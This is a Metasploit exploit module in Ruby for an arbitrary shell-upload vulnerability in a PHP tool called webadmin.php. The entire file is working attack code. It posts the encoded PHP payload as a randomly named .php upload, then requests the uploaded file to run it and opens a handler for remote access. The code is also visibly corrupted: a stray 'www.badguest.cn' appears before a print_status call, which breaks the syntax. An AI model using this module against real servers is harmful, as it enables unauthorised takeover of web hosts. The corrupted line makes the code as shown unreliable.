require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'webadmin <= Shell Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary shell upload vulnerability in
the webadmin.php
},
'Author' => [ 'Caddy-Dz' ],
'License' => MSF_LICENSE,
'References' => ["http://wacker-welt.de/webadmin/webadmin.php.gz" ],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sept 13, 2011'
))
register_options([
OptString.new('URI', [true, "Path to webadmin ", "/"]),
], self.class)
end
def exploit
boundary = rand_text_alphanumeric(6)
fn = rand_text_alphanumeric(8)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; "
data << "filename=\"#{fn}.php\"\r\nContent-Type: application/x-httpd-php\r\n\r\n"
data << payload.encoded
data << "\r\n--#{boundary}--"
res = send_request_raw({
'uri' => datastore['URI'] + "/webadmin.php",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
}
}, 25)
if (res)
www.badguest.cn print_status("Successfully uploaded shell.")
shell_path = res.body.split("_")[0]
print_status("Trying to access shell at #{shell_path}...")
res = send_request_raw({
'uri' => datastore['URI'] + shell_path,
'method' => 'GET',
}, 0.01)
else
print_error("Error uploading shell")
end
handler
end
end